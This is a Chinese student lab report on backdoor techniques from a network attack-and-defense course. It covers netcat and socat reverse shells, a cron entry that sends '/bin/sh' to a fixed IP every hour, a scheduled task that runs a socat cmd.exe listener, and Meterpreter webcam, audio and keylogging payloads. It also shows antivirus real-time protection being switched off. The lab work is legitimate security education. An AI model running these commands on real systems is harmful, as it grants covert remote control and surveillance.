当前位置: 首页 > news >正文

20232410 2025-2026-1 《网络与系统攻防技术》实验二实验报告

20232410  2025-2026-1 《网络与系统攻防技术》实验二实验报告
一、实验内容
image

回答问题:
(1)例举你能想到的一个后门进入到你系统中的可能方式?
比如某些钓鱼邮件或者钓鱼网站,携带着一些捆绑着后门程序的exe文件。若点击运行就有可能被植入后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:通过schtasks命令创建定时任务,指定后门在特定时间自动执行。
Linux:通过某些工具将后门代码注入到系统常驻进程中,借助合法进程的启动来激活。
(3)Meterpreter有哪些给你映像深刻的功能?
可以远程控制摄像头拍照并且记录电脑音频,让我措不及防。
(4)如何发现自己有系统有没有被安装后门? 
可以通过任务管理器查看 CPU 占用异常的进程或者使用杀毒软件扫描。
二、实验过程
2.1 使用netcat获取主机操作Shell,cron启动任务
在Windows中运行nc开始监听2410端口
image

监听状态
image

kali反弹连接Windows,提供自己的shell
image

连接成功,主机获得虚拟机的shell
image

使用cron定时启动任务,在cron表的末尾添加命令50 * * * * /bin/netcat 172.20.10.3 2410 -e /bin/sh,使得在每小时的50分时都交出本机的shell控制权。
image
image

在50分后,主机得到控制权
image

2.2 使用socat获取主机操作Shell,任务计划启动
在Windows下,打开:控制面板->管理工具->任务计划程序,新建任务计划。选择启动的程序为socat.exe,输入参数 tcp-listen:2410 exec:cmd.exe,pty,stderr,任务调整为锁屏后启动,kali终端启动监听。结果如下
image

2.3 使用MSF meterpreter生成可执行文件(后门),传送到主机并运行获取主机Shell
Meterpreter是Metasploit框架中一款功能强大的后渗透攻击载荷,它支持文件操作、屏幕截图、键盘记录等功能。
image

将后门文件传给本机,这里使用了共享文件。先挂载共享文件夹,创建挂载点,再传输文件
image
image

进入msf控制台进行配置
image
image

得到了shell
image

2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

继续调用指令,继续录音拍照等操作
image

调用摄像头权限如图:
image

尝试提权
image

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取到反弹连接Shell
使用命令生成以pwn20232410a为模板的shellcode文件20232410_pwn
image

输入指令msfconsole,进入msf命令行,操作同上,然后运行文件
image

得出结果
image

三、问题及解决
1.在获取摄像头权限时,系统安全中心预警,强制删除了后门文件。
解决:关闭系统安全中心的实时保护:
image

并且实时保护一段时间后会自动开启,需要小心。

2.后门文件在使用ncat传输到主机上时无法打开,且发现文件大小与原文件不一致。
解决:使用共享文件的方法。创建一个主机与kali之间共享的文件,通过这个文件来传输
image

3.在执行exploit指令时出现错误:
image

显示session1关闭。
解决:参考了毕同学的方法
image

四、心得体会

这次有关后门原理与实践的实验让我对后门的攻击操作有了更深刻的认识。我初步了解了netcat,socat与MSF meterpreter的原理与实际操作。整个实验过程中我也遇到了许多问题,包括防火墙调整,权限控制,传输工具选择与版本兼容。但在同学的经验总结与帮助下都得到了总结,让我受益颇多。

http://www.zskr.cn/news/25646.html

相关文章:

  • SQLite简单使用
  • 心理咨询系统
  • Adaptive Learning Rate(自适应学习率) - -一叶知秋
  • 新学期每日总结(第12天)
  • 17 线程的创建
  • 2025.10.20总结 - A
  • 一般公共预算收入 + 全国政府性基金收入
  • 傻瓜式处理kauditd0病毒程序记录
  • 软件工程第二次团队作业
  • 好用的网址
  • 低代码赋能业务创新:打破数字鸿沟,释放业务潜能
  • 10/20/2025杂题 关于在线性时间内求解低次多项式的幂
  • 计算机毕业设计 基于EChants的海洋气象数据可视化平台设计与建立 Python 大数据毕业设计 Hadoop毕业设计选题【附源码+文档报告+安装调试】
  • ZR 2025 NOIP 二十连测 Day 5
  • 关于单片机内部ADC采样率,采样精度的理解与计算整理 - 实践
  • Mac版PDF Squeezer v4.5.1安装教程(DMG文件下载+详细步骤)​
  • 详细揭秘:马拉车算法
  • 黑马程序员Java基础笔记
  • 实用指南:linux磁盘空间爆满排查与清理
  • 详细介绍:从零开始的C++学习生活 2:类和对象(上)
  • 【aigc】chrome-devtools-mcp怎么玩? - 指南
  • 记账:流水报表
  • 英伟达微型AI工作站的架构解析与性能突破
  • 20232418 2025-2026-1 《网络与系统攻防技术》实验二实验报告
  • CF1777E Edge Reverse
  • 2025年市面上高杆灯品牌前十强推荐榜:选购指南与行业洞察
  • 2025年国内高杆灯十大品牌权威推荐榜单
  • 2025年市面上高杆灯品牌及国内公司推荐榜单
  • 2025年给汤机/重力铸造自动化/机加工自动化厂家推荐榜单:专业设备与智能解决方案权威解析
  • 2025年发电机厂家权威推荐榜:柴油发电机组/康明斯/玉柴/高压/大功率发电机组专业选购指南